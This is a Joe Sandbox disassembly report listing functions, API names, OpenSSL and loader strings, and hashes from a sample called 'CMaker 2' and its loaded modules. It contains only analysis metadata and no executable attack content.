                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B2246570
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                  • API String ID: 511975427-1099454403
                                                                                                                                                                                  • Opcode ID: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
                                                                                                                                                                                  • Instruction ID: 5a654ca3f8eed03887530d3c4fa6d02be611f6bc94348ec42a804765bbc03f35
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
                                                                                                                                                                                  • Instruction Fuzzy Hash: FA41B372B18A029AF7758B91E87437837B8EB48784F554835EA1ED7A90DF6CE650CB00
                                                                                                                                                                                  Function 00007FFD935A1A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007F294
                                                                                                                                                                                  • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                  • API String ID: 1145900664-1794268454
                                                                                                                                                                                  • Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                                  • Instruction ID: 44c84f117b8ed25d14ebe2cf534175bfc3eeb5a373b833b904fef501018f1b6a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                                  • Instruction Fuzzy Hash: ABA17226B0AB8291FBA6DFA5D4607B833A8FF88B48F184235DE5C57355DF28E191C310
                                                                                                                                                                                  Function 00007FFD9DFA32D0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                  • Opcode ID: 4054133e40b1959e30dc0a75aba67dbbe5993da8583830be354a929f77bfd96a
                                                                                                                                                                                  • Instruction ID: 3cc8bd89e1ca772ccaa618616e80aeb3e2531fe8cc94a6ab8745c7a193138063
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4054133e40b1959e30dc0a75aba67dbbe5993da8583830be354a929f77bfd96a
                                                                                                                                                                                  • Instruction Fuzzy Hash: E7817D21F0C6C34AF670AFE598632B966D0AFC5780F444335DA8D47796FE3CE9498610
                                                                                                                                                                                  Function 00007FFD9DFD2B10 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                  • Opcode ID: 30e28fcbfb3a46fa9e67cb2bb80d6c3e20035b30d14687dd822705d8e6ad13c0
                                                                                                                                                                                  • Instruction ID: 1a23e43db4e875d8136ff0fb683a6552f7f4a7ffb4f27948d2d5567bc9041111
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30e28fcbfb3a46fa9e67cb2bb80d6c3e20035b30d14687dd822705d8e6ad13c0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78819D21F082C38AFA74AFE5A46327962D0AF85784F044335DACD87796FF3CE9498250
                                                                                                                                                                                  Function 00007FFD93482730 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2263419318.00007FFD93480000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD934E2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD9352E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93531000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93536000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93593000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93595000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93598000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264210337.00007FFD93599000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264282200.00007FFD9359B000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                  • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                                  • Instruction ID: 6792af44f85ec22bbabd7288ea5bd8e6bca8db6ff9cf361de9803670e96bcdb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6781C321F0C24387FA70ABE694712BA66E8AF49780F568535DD4CF7796DE3CE8468700
                                                                                                                                                                                  Function 00007FFD9F3B284C Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 349153199-0
                                                                                                                                                                                  • Opcode ID: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
                                                                                                                                                                                  • Instruction ID: 04abf19c049407d04d21f3e8e74203ddb7d1882879f81cd7b73d1b38ff3ba440
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
                                                                                                                                                                                  • Instruction Fuzzy Hash: 29818B20F0864386FA76BBE7A8752796390AF85782F04473DDD0D8F396DE3CE9528200
                                                                                                                                                                                  Function 00007FF6FABF60B0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                  • Opcode ID: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
                                                                                                                                                                                  • Instruction ID: 58299c967cc52368a5bca97e44246e660f45fb03daf624c6653088e5be0ea759
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC12C469E0C2C346FB205B94E1242B9B699FB52750FCC417DDEA9866C4FF3DE9809B10
                                                                                                                                                                                  Function 00007FF6FABEF440 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                  • Opcode ID: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
                                                                                                                                                                                  • Instruction ID: 5cd1ede6f597023a0ed36f1a76f0d20770555450b2b4e465ef96749780edff71
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62129632F0D18386FB245A34E0946B976A2FB42755FD841F5D6A9866C4FF3DE890CB20
                                                                                                                                                                                  Function 00007FF6FABE6E70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F14
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F1A
                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE6F5C
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: GetEnvironmentVariableW.KERNEL32(00007FF6FABE29B0), ref: 00007FF6FABE7077
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7040: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FABE7099
                                                                                                                                                                                    • Part of subcall function 00007FF6FABF7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FABF7E05
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                  • API String ID: 365913792-1339014028
                                                                                                                                                                                  • Opcode ID: 5bd611a46aa108d535a11aa0f72055f948f25ea8d232a5976be4a42b3ba8e0a9
                                                                                                                                                                                  • Instruction ID: f19d115e45f4e5482a0ed08d85c25666350580bbace33afe6a2ee5453af97d60
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5bd611a46aa108d535a11aa0f72055f948f25ea8d232a5976be4a42b3ba8e0a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41C465B1964241FB21EB65E8A02B96261AF877C0FC450F5EE2DC77D6FE3CE5418340
                                                                                                                                                                                  Function 00007FF6FABE1030 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                  • Opcode ID: 9a877eb4e44f1ed687fc1ce12ddea256fc485ba92bf56b3aff1795f8d89bdef8
                                                                                                                                                                                  • Instruction ID: 97f6ae28e7adeab17516ac88c1200cb8353f964b36fc9da8c4194eafbeccf629
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a877eb4e44f1ed687fc1ce12ddea256fc485ba92bf56b3aff1795f8d89bdef8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72419361B0864242EB24DB16B8806BAA7A1FF56BC4FD490B1DD6EC77D6FE3CE0459301
                                                                                                                                                                                  Function 00007FF6FABE71F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                                                                  • Opcode ID: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction ID: 39d8d0078324366ea93cfb538059ad89458e2f92bd8e413e15ac5f602ef06f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ec6545137c218525aca36a5c69f06ebb26d0c39709c03294cc33139ca873a5f
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7415372A08B8285EB20DB64F4952AA7361FB95364F944379E6BD837D5EF7CD0448B00
                                                                                                                                                                                  Function 00007FF6FABECE38 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                  • Opcode ID: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction ID: e8b523ac4dc007905ad3982da40c624cfcfc8085b0101e87d1acf2e76bca7ef5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD1A332A187428AEB60DF65D4843AD77A0FB46788F9001B5EE5D977DAEF78E081C740
                                                                                                                                                                                  Function 00007FFD935A2545 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 206COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007C3420ErrorLast
                                                                                                                                                                                  • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                  • API String ID: 994887846-502574948
                                                                                                                                                                                  • Opcode ID: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
                                                                                                                                                                                  • Instruction ID: ce41e9b58a705feb2ad283f84f0f055a8fd66649c7678180fe4e39fc55b8f5e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2e6772690861a5a0206d813afd3d798138ea416ca04513dbf9d65ad58d7885
